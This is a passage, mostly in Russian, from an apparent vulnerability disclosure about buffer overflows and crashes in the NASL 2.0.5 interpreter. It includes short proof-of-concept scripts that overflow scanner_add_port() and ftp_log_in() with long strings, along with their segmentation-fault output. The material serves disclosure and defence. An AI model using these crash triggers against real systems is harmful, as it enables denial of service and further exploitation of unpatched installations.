$ nasl t1.nasl
** WARNING : packet forgery will not work ** as NASL is not running as root
[1384](t1.nasl) insstr: warning! 1st index 3 greater than 2nd index -3
Segmentation fault (core dumped)
Уязвимость намбер 2 - переполнение буфера в функции scanner_add_port() - используется передача длинного аргумента proto: $ cat t2.nasl
scanner_add_port(port : 80, proto : crap(data:'A', length:300));
$ nasl t2.nasl
** WARNING : packet forgery will not work
** as NASL is not running as root
Segmentation fault (core dumped)


Проблема намбер 3 - переполнение буфера в ftp_log_in() - при передаче длинных значений 'user'/'pass':
$ cat t3.nasl
ftp_log_in(socket : open_sock_tcp(21),
pass : "11", user:
crap(data:'A',length:8192));
$ nasl t3.nasl
** WARNING : packet forgery will not work ** as NASL is not running as root Segmentation fault (core dumped)
Тестировано на:
Linux RedHat 7.2
$ nasl -v | grep nasl
nasl 2.0.5
В вышедшей на днях версии 2.0.6 пофиксены баги, связанные с libnasl.